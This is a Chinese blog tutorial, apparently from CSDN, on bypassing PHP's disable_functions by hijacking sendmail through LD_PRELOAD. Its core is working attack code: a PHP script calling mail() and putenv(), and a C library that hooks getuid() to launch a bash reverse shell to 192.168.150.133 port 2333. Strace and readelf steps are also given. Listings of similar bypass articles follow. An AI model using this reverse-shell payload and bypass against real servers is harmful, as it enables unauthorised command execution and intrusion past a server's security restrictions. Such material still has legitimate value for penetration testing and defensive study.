通过LD_PRELOAD绕过disable_functions

最新推荐文章于 2024-07-24 13:13:54 发布
最新推荐文章于 2024-07-24 13:13:54 发布
阅读量37 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sjsyg/article/details/132432740
版权

什么是LD_PRELOAD

LD_PRELOAD是Linux/Unix系统的一个环境变量,它影响程序的运行时的链接(Runtime linker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。

我们可以重写程序运行过程中所调用的函数并将其编译为动态链接库文件,然后通过我们对环境变量的控制来让程序优先加载这里的恶意的动态链接库,进而实现我们在动态链接库中所写的恶意函数。

实现绕过

绕过步骤

步骤分为以下两步:
第一 php需要启动一个新的进程
第二 控制环境变量

利用 mail 函数启动新进程

(1)我们在nginx/html目录下写一个web.php

<?php
mail("a@localhost","","","","");
?>

(2)再用命令去追踪系统调用,看他它调用了哪些动态链接库,或是启动了哪些新进程

strace -f php web.php 2>&1 | grep -A2 -B2 execve

(3)我们再来查看sendmail,就像上面查看ls一样,然后找比较方便的动态链接库

readelf -Ws /usr/sbin/sendmail

(4)编译反弹shell
hook_getuid.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload() {
    system("bash -c 'bash -i >& /dev/tcp/192.168.150.133/2333 0>&1'");
}

uid_t getuid() {
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    unsetenv("LD_PRELOAD");
    payload();
}

然后再重复上面的步骤
(5)修改web.php,添加putenvputenv函数来实现链接库的设置

<?php
putenv('LD_PRELOAD=/usr/local/nginx/html/hook_getuid.so');// 注意这里的目录要有访问权限
mail("a@localhost","","","","");
?>

(6)给予权限

chown -R apache:apache hook_getuid.so
chown -R apache:apache web.php

(7)启动web.php

php web.php

因为环境原因没有显示连接成功,等我环境配置好后再来。

sjsyg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用ld_preload方式绕过disable_functions
Jiajiajiang_的博客
08-06 1141
参考链接:https://github.com/l3m0n/Bypass_Disable_functions_Shell 连了菜刀无法执行命令系列。 去看phpinfo(别问我怎么看,你都能上传一句话了,phpinfo不是问题 好家伙!禁用了这么多函数,这可咋整 行我去找方法了, 试过了pcntl_exec的方法,没有成功,来用ld_preload绕过(mail 啥也别说了,上马 ...
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
利用 LD_PRELOAD劫持动态链接库,绕过 disable_function
qq_68163788的博客
11-30 1288
LD_PRELOAD是一个环境变量,它允许用户在程序加载动态链接库(共享对象)时指定要预先加载的库。这个功能可以用来替换程序中的特定函数,或者添加额外的功能。 使用LD_PRELOAD可以在不修改源代码的情况下,对程序的行为进行修改。这对于调试、性能分析或者添加额外的安全检查非常有用。例如,可以使用LD_PRELOAD来替换标准库中的malloc和free函数,从而实现内存泄漏检测或者统计内存使用情况。 需要注意的是,LD_PRELOAD只对动态链接的程序有效
无字母数字RCE与LD_PRELOADdisable_functions
D.MIND 的博客
04-19 1049
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
Bypass disable_function —— LD_PRELOAD
qq_42851946的博客
05-21 1575
Bypass disable_function —— LD_PRELOAD CTFHub-web技能树中的一道题 做这道题之前,先要稍微了解下: LD_PRELOAD: 是Linux系统的一个环境变量,它指定的*.so文件会在程序本身的*.so文件之前被加载。 putenv(): PHP函数,可以设置环境变量 mail(),error_log() PHP函数,在运行时会执行系统中的程序:sendmail 题目描述 已经拿到了shell,但是PHP配置中的disable_functions禁用了大部分常规的的
PHP绕过LD_PRELOAD bypass disable_functions
4ut15m's blog
03-03 1511
序 不能执行系统命令的webshell是没有灵魂的. LD_PRELOAD 众所周知,代码在编译成程序的时候有一个过程叫做链接-->将所引用的函数与变量链接到可执行程序中.编译过程中将所有的函数库链接完毕叫做静态链接,而动态链接则是编译过程中不进行链接操作,在程序运行时再动态的载入函数库.不管是静态链接还是动态链接,目的都很明确,载入函数库. LD_PRELOAD是与载入函数库相关的...
linux静态库函数劫持,LD_PRELOAD & putenv() 绕过 disable_functions & open_basedir
weixin_29197051的博客
05-07 439
这次TCTF中一道题,给出了一个PHP一句话木马,设置了open_basedir,disable_functions包含所有执行系统命令的函数,然后目标是运行根目录下的/readflag,目标很明确,即绕过disable_functions和open_basedir,当然我还是一如既往的菜,整场比赛就会做个签到,这题也是赛后看WP才明白。LD_PRELOADLD_PRELOAD是Unix中的一个环...
php ld preload,利用环境变量LD_PRELOAD绕过php disable_function执行系统命令
weixin_35916239的博客
03-17 198
0x00 前言在做渗透测试的时候如果遇到安全配置比较好的服务器,当你通过各种途径获得一个php类型的webshell后,却发现面对的是无法执行系统命令的尴尬,因为这类服务器针对命令执行函数做了防范措施,后续的渗透行为都因此而止步。笔者这里分享一个绕过思路,希望你能在实际测试中派上用场。0x02 绕过思路严苛环境下php设置的disable_function如下: dlexecsystempa...
disable_functions绕过总结
闵行小鱼塘
05-18 1882
总结下disable_functions绕过的一些方法
绕过disable_functions,LD_PRELOAD hijack so file
weixin_30423977的博客
12-21 121
绕过disable_functions执行命令实验 看下disable函数,所有命令函数都被禁用: 编译64位共享库: 命令成功执行: 参考链接: https://www.freebuf.com/articles/web/192052.html https://www.t00ls.net/thread-49115-1-1.html https://github.com/yangya...
openredir:通过 LD_PRELOAD 重定向文件打开操作
05-31
通过`LD_PRELOAD`,我们可以替换系统调用表中的`open`条目,实现对它的拦截和自定义行为。 5. **项目结构**:`openredir-master`压缩包包含项目的主要源代码和其他资源。解压后,用户可以通过编译源代码来生成所需...
PRELOAD:LD_PRELOAD rootkit实用程序
05-23
这里的"PRELOAD:LD_PRELOAD rootkit实用程序"是指利用`LD_PRELOAD`环境变量来加载一个自定义的动态链接库(`.so`文件),从而在系统调用层面进行hook或注入代码,实现对目标程序的控制或监控。这在某些情况下可以...
free_checker:使用LD_PRELOAD的简单内存泄漏查找程序(用于C程序)
05-06
**免费检查器(Free Checker)**是一个针对C语言程序的简单内存泄漏检测工具,它巧妙地利用了Linux动态链接器的特性——`LD_PRELOAD`。这个工具的主要目的是帮助程序员定位并解决C语言编程中常见的内存泄漏问题。...
srv-shim:通过LD_PRELOAD getaddrinfoconnect挂钩对旧系统的SRV记录支持
05-15
LD_PRELOAD=target/debug/libsrvshim.so \ curl _my-service._tcp.domain 您还可以在/etc/ld.so.conf创建一个条目,以使它被加载到系统上的所有进程中。 OSX: DYLD_INSERT_LIBRARIES=/abs/path/to/libsrvshim....
Vue3+ element plus 前后分离admin项目安装教程
luck332的专栏
07-21 560
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 795
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 969
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
c++语言实现类似swoole扩展的项目实践
最新发布
北风之神Boreas
07-24 174
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
LD_PRELOAD
09-01
LD_PRELOAD是一个环境变量,用于在运行时强制加载指定的共享库文件。它的作用是在程序启动前加载指定的库文件,从而重定向或替换程序中的函数调用。通常使用unsetenv("LD_PRELOAD")来删除LD_PRELOAD环境变量,以避免...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值